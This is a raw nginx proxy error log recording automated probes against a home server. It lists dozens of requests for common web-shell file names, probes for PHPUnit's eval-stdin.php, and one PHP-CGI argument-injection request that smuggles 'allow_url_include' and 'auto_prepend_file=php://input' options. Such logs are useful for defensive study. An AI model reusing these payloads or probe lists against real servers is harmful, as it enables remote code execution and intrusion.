+2026/01/19 15:19:09 [error] 430#430: *316835 open() "/var/www/html/asf.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /asf.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:09 [error] 430#430: *316835 open() "/var/www/html/ulc2.ph" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ulc2.ph HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:09 [error] 430#430: *316835 open() "/var/www/html/berm.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /berm.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:10 [error] 430#430: *316835 open() "/var/www/html/indosec.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /indosec.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:10 [error] 430#430: *316835 open() "/var/www/html/hshs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /hshs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:10 [error] 430#430: *316835 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:10 [error] 430#430: *316835 open() "/var/www/html/fck.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /fck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:11 [error] 430#430: *316835 open() "/var/www/html/87.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /87.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:11 [error] 430#430: *316835 open() "/var/www/html/tons.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /tons.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:12 [error] 430#430: *316835 open() "/var/www/html/Cache.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /Cache.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:12 [error] 430#430: *316835 open() "/var/www/html/504.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /504.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:12 [error] 430#430: *316835 open() "/var/www/html/nox.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /nox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:13 [error] 430#430: *316835 open() "/var/www/html/xinder.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xinder.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:13 [error] 430#430: *316835 open() "/var/www/html/sxx.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /sxx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:13 [error] 430#430: *316835 open() "/var/www/html/gif.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /gif.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:13 [error] 430#430: *316835 open() "/var/www/html/ws38.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws38.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:13 [error] 430#430: *316835 open() "/var/www/html/an8.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /an8.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:14 [error] 430#430: *316835 open() "/var/www/html/z57.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /z57.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:14 [error] 430#430: *316835 open() "/var/www/html/cp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /cp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:14 [error] 430#430: *316835 open() "/var/www/html/lisa.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /lisa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:14 [error] 430#430: *316835 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:15 [error] 430#430: *316835 open() "/var/www/html/vxrl.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /vxrl.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:15 [error] 430#430: *316835 open() "/var/www/html/ws28.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws28.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:15 [error] 430#430: *316835 open() "/var/www/html/mariju.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /mariju.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:15 [error] 430#430: *316835 open() "/var/www/html/api.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /api.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:16 [error] 430#430: *316835 open() "/var/www/html/s.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /s.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:16 [error] 430#430: *316835 open() "/var/www/html/ws35.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:16 [error] 430#430: *316835 open() "/var/www/html/h8h9.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /h8h9.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:16 [error] 430#430: *316835 open() "/var/www/html/w0.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /w0.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:17 [error] 430#430: *316835 open() "/var/www/html/indo.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /indo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:17 [error] 430#430: *316835 open() "/var/www/html/lanz.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /lanz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:17 [error] 430#430: *316835 open() "/var/www/html/amax.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /amax.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:18 [error] 430#430: *316835 open() "/var/www/html/zy.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /zy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:18 [error] 430#430: *316835 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:18 [error] 430#430: *316835 open() "/var/www/html/f0x.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /f0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:18 [error] 430#430: *316835 open() "/var/www/html/yyy.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /yyy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:19 [error] 430#430: *316835 open() "/var/www/html/hehehehe.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /hehehehe.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:19 [error] 430#430: *316835 open() "/var/www/html/ki1k.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ki1k.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:19 [error] 430#430: *316835 open() "/var/www/html/jp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /jp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:19 [error] 430#430: *316835 open() "/var/www/html/21x.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /21x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:20 [error] 430#430: *316835 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:20 [error] 430#430: *316835 open() "/var/www/html/new.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /new.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:20 [error] 430#430: *316835 open() "/var/www/html/sellSEX.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /sellSEX.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:20 [error] 430#430: *316835 open() "/var/www/html/ths.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ths.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:21 [error] 430#430: *316835 open() "/var/www/html/xxw.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xxw.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:21 [error] 430#430: *316835 open() "/var/www/html/xeeex.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xeeex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:21 [error] 430#430: *316835 open() "/var/www/html/alfa1.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /alfa1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:21 [error] 430#430: *316835 open() "/var/www/html/bras.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bras.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:22 [error] 430#430: *316835 open() "/var/www/html/public/new2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /public/new2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:22 [error] 430#430: *316835 open() "/var/www/html/goat.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /goat.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:22 [error] 430#430: *316835 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:22 [error] 430#430: *316835 open() "/var/www/html/aks.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /aks.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:23 [error] 430#430: *316835 open() "/var/www/html/dirs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /dirs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:23 [error] 430#430: *316835 open() "/var/www/html/000.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /000.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:23 [error] 430#430: *316835 open() "/var/www/html/00.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /00.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:24 [error] 430#430: *316835 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /w.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:24 [error] 430#430: *316835 open() "/var/www/html/f8.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /f8.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:24 [error] 430#430: *316835 open() "/var/www/html/dds.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /dds.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:24 [error] 430#430: *316835 open() "/var/www/html/sck.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /sck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:25 [error] 430#430: *316835 open() "/var/www/html/bless14.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bless14.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:25 [error] 430#430: *316835 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:25 [error] 430#430: *316835 open() "/var/www/html/file17.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /file17.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:25 [error] 430#430: *316835 open() "/var/www/html/b374k.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /b374k.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:26 [error] 430#430: *316835 open() "/var/www/html/old-index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /old-index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:26 [error] 430#430: *316835 open() "/var/www/html/acwfihfh.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /acwfihfh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:26 [error] 430#430: *316835 open() "/var/www/html/vv.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /vv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:27 [error] 430#430: *316835 open() "/var/www/html/JPG.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /JPG.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:27 [error] 430#430: *316835 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:27 [error] 430#430: *316835 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:27 [error] 430#430: *316835 open() "/var/www/html/alfa3.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /alfa3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:28 [error] 430#430: *316835 open() "/var/www/html/rendi59.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /rendi59.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:28 [error] 430#430: *316835 open() "/var/www/html/2index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /2index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:28 [error] 430#430: *316835 open() "/var/www/html/1p.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /1p.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:28 [error] 430#430: *316835 open() "/var/www/html/.rxr.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.rxr.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:29 [error] 430#430: *316835 open() "/var/www/html/13.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /13.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:29 [error] 430#430: *316835 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:29 [error] 430#430: *316835 open() "/var/www/html/out.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /out.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:29 [error] 430#430: *316835 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:30 [error] 430#430: *316835 open() "/var/www/html/var/www/tagtek/ans.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /var/www/tagtek/ans.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:30 [error] 430#430: *316835 open() "/var/www/html/back.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /back.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:30 [error] 430#430: *316835 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /elp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:30 [error] 430#430: *316835 open() "/var/www/html/se.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /se.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:31 [error] 430#430: *316835 open() "/var/www/html/esp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /esp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:19:31 [error] 430#430: *316835 open() "/var/www/html/rc.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /rc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 15:32:52 [error] 430#430: *316844 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:16:23 [error] 431#431: *316876 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.83.27.140, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/19 16:18:21 [error] 431#431: *316880 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:04 [error] 437#437: *316904 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 16:48:05 [error] 437#437: *316904 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 62.171.165.176, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" 